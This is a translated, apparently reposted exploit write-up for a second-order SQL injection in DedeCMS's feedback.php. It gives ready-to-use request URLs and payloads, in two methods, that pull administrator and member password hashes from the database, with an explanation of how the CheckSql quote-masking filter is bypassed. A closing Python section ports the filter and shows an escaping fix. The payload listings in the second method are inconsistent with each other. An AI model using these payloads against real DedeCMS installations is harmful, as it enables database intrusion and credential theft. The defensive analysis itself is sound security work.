Dedecms second injection classic exp Structure

Source: Internet
Author: User

0x01 Preface

Long ago, yy@safekeyer.com found a classic second-order injection in DedeCMS during a code audit, but because the injected field cannot exceed 60 bytes it seemed of limited practical use. With the collective effort of safekeyer we found two ways to break through that limit. This article focuses on constructing the exp; for the detailed vulnerability analysis see: http://www.wooyun.org/bugs/wooyun-2010-018562

0x02 Method 1: Direct shortening

Theory: insert --> select --> insert --> select

Exp (the original marks the key data in red; here it is the title parameter of the first request):

First insert:

    http://www.bkjia.com/dede/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",8,(select pwd from %23@__admin))%23&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA

Second insert:

    http://127.0.0.1/dede/plus/feedback.php?action=send&comtype=reply&fid=27&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA

So the payload of the first insert is:

    1',"'",8,(select pwd from %23@__admin)%23

Database contents and returned result: (screenshots in the original)

Analysis of the bypass. The relevant part of the detection code (line numbers removed, loose comparisons corrected to strict ones, the initialisation that the original omits restored):

    function CheckSql($db_string, $querytype = 'select')
    {
        // ... (omitted here)
        $clean   = '';   // copy of the statement with every quoted string masked
        $old_pos = 0;
        $pos     = -1;
        // Replace each single-quoted literal, honouring backslash escapes, with $s$
        while (TRUE)
        {
            $pos = strpos($db_string, '\'', $pos + 1);
            if ($pos === FALSE)
            {
                break;
            }
            $clean .= substr($db_string, $old_pos, $pos - $old_pos);
            while (TRUE)   // look for the closing quote of this literal
            {
                $pos1 = strpos($db_string, '\'', $pos + 1);
                $pos2 = strpos($db_string, '\\', $pos + 1);
                if ($pos1 === FALSE)
                {
                    break;
                }
                elseif ($pos2 === FALSE || $pos2 > $pos1)
                {
                    $pos = $pos1;
                    break;
                }
                $pos = $pos2 + 1;   // skip the escaped character
            }
            $clean .= '$s$';
            $old_pos = $pos + 1;
        }
        $clean .= substr($db_string, $old_pos);
        // echo $clean; exit();
        $clean = trim(strtolower(preg_replace(array('~\s+~s'), array(' '), $clean)));
        // ... (omitted here)
    }

The detection code above replaces every string between a pair of single quotes in the SQL statement with the token $s$. The statement produced by the second insert is:

    INSERT INTO `dede_feedback` (`aid`, `typeid`, `username`, `artitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) VALUES ('1', '0', 'test', '1', "'", 8, (select pwd from dede_admin)#', '127.0.0.1', '1', '000000', '2', '0', '0', 'feedback', '6', 'asfsafsdaf')

After processing by the detection code it becomes:

    insert into `dede_feedback` (`aid`, `typeid`, `username`, `artitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) values ($s$, $s$, "$s$, $s$, $s$)

and so the check in CheckSql($db_string, $querytype = 'select') is bypassed. The crux is the handling of single quotes. The filter treats everything between two single quotes as a string, so the single quote wrapped in double quotes ("'") is taken by the filter as the start of another string, and the rest of the payload disappears inside that string. In the real INSERT, however, MySQL reads "'" as a double-quoted literal, so that single quote never opens a string there. The single quote thus plays the decisive role in the bypass: the detection only ever sees strings, while in the complete insert the quote is not a string delimiter at all.

0x03 Method 2: Two inserts are both valid

Theory: insert --> select --> insert --> select

Exp (the original marks the key data in red; here they are the title parameter of the first request and the msg parameter of the second):

First insert:

    http://127.0.0.1/dede/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@'''),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA

Second insert:

    http://127.0.0.1/dede/plus/feedback.php?aid=1&action=send&comtype=reply&fid=48&isconfirm=yes&validate=craf&msg=*/1,2,4,5,6,7,(select/**/concat(userid,0x3a,pwd)/**/from/**/dede_member/**/limit/**/1))%23

The two insert operations store different parts of the payload in the database; the two parts are then combined into one complete payload.

First insert:

    1',(char(@''')),/*

Second insert:

    */1,2,3,4,5,6,7,(select/**/concat(userid,0x3a,pwd)/**/from/**/dede_member/**/limit/**/1)%23

The resulting statement:

    insert into `dede_feedback` (`aid`, `typeid`, `username`, `artitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) VALUES ('1', '0', 'test', '1', (char(@''''),/*', '127.0.0.1', '1', '000000', '2', '0', '0', 'feedback', '0', '@'\''*/, 2, 3, 4, 5, 6, 7, 8, (select concat(userid,0x7c,pwd) from dede_admin)')

After processing by the anti-injection function (truncated in the source):

    insert into `dede_feedback` (`aid`, `typeid`, `username`, `artitle`, `ip`, `ischeck`, `dtime`, `mid`, `bad`, `good`, `ftype`, `face`, `msg`) values ($s$, $s$, (char(@'$s$, $s$, $s$, $s$

Database contents and returned results: (screenshots in the original)

0x04 Conclusion

If there are any errors, please correct them. If you have any suggestions, I would welcome a discussion.
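As an added illustration (not code from this article or from DedeCMS), the following Python port of the string-masking loop in CheckSql() described under Method 1 shows what the filter inspects when the stored title from the first insert is re-embedded in the reply INSERT, beside the addslashes-style escaping of the stored value that the reply path should apply before the second insert. The reduced column list, the escape_literal() helper and the sample title are assumptions for the demonstration.

```python
import re


def mask_quoted_strings(db_string: str) -> str:
    """Python port (assumed faithful) of the masking loop in CheckSql():
    every single-quoted literal, honouring backslash escapes, becomes the
    token $s$; whitespace is collapsed and the result lower-cased.
    This masked string is all the later keyword checks ever see."""
    clean, old_pos, pos = "", 0, -1
    while True:
        pos = db_string.find("'", pos + 1)
        if pos == -1:
            break
        clean += db_string[old_pos:pos]
        while True:                      # look for the closing quote
            pos1 = db_string.find("'", pos + 1)
            pos2 = db_string.find("\\", pos + 1)
            if pos1 == -1:
                break
            if pos2 == -1 or pos2 > pos1:
                pos = pos1
                break
            pos = pos2 + 1               # skip an escaped character
        clean += "$s$"
        old_pos = pos + 1
    clean += db_string[old_pos:]
    return re.sub(r"\s+", " ", clean).strip().lower()


def escape_literal(value: str) -> str:
    """addslashes-style escaping (assumed fix): what the reply path should
    apply to a stored value before embedding it in a second INSERT."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


# Constructed sample: the title stored by the first insert of Method 1.
STORED_TITLE = "1', \"'\", 8, (select pwd from dede_admin)#"


def reply_insert(title: str, escape: bool) -> str:
    """Build the second INSERT as the reply path does (escape=False, the
    stored value is trusted) or as it should (escape=True)."""
    if escape:
        title = escape_literal(title)
    return ("INSERT INTO `dede_feedback` (`aid`, `artitle`, `ip`, `msg`) "
            f"VALUES ('1', '{title}', '127.0.0.1', 'asfsafsdaf')")


def filter_view(title: str, escape: bool) -> str:
    """What CheckSql() inspects for the given stored title."""
    return mask_quoted_strings(reply_insert(title, escape))
```

Without escaping the masked view reads values ($s$, $s$, "$s$, $s$, $s$) and contains neither select nor #, matching the article; with escaping the whole payload stays inside one $s$ literal.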
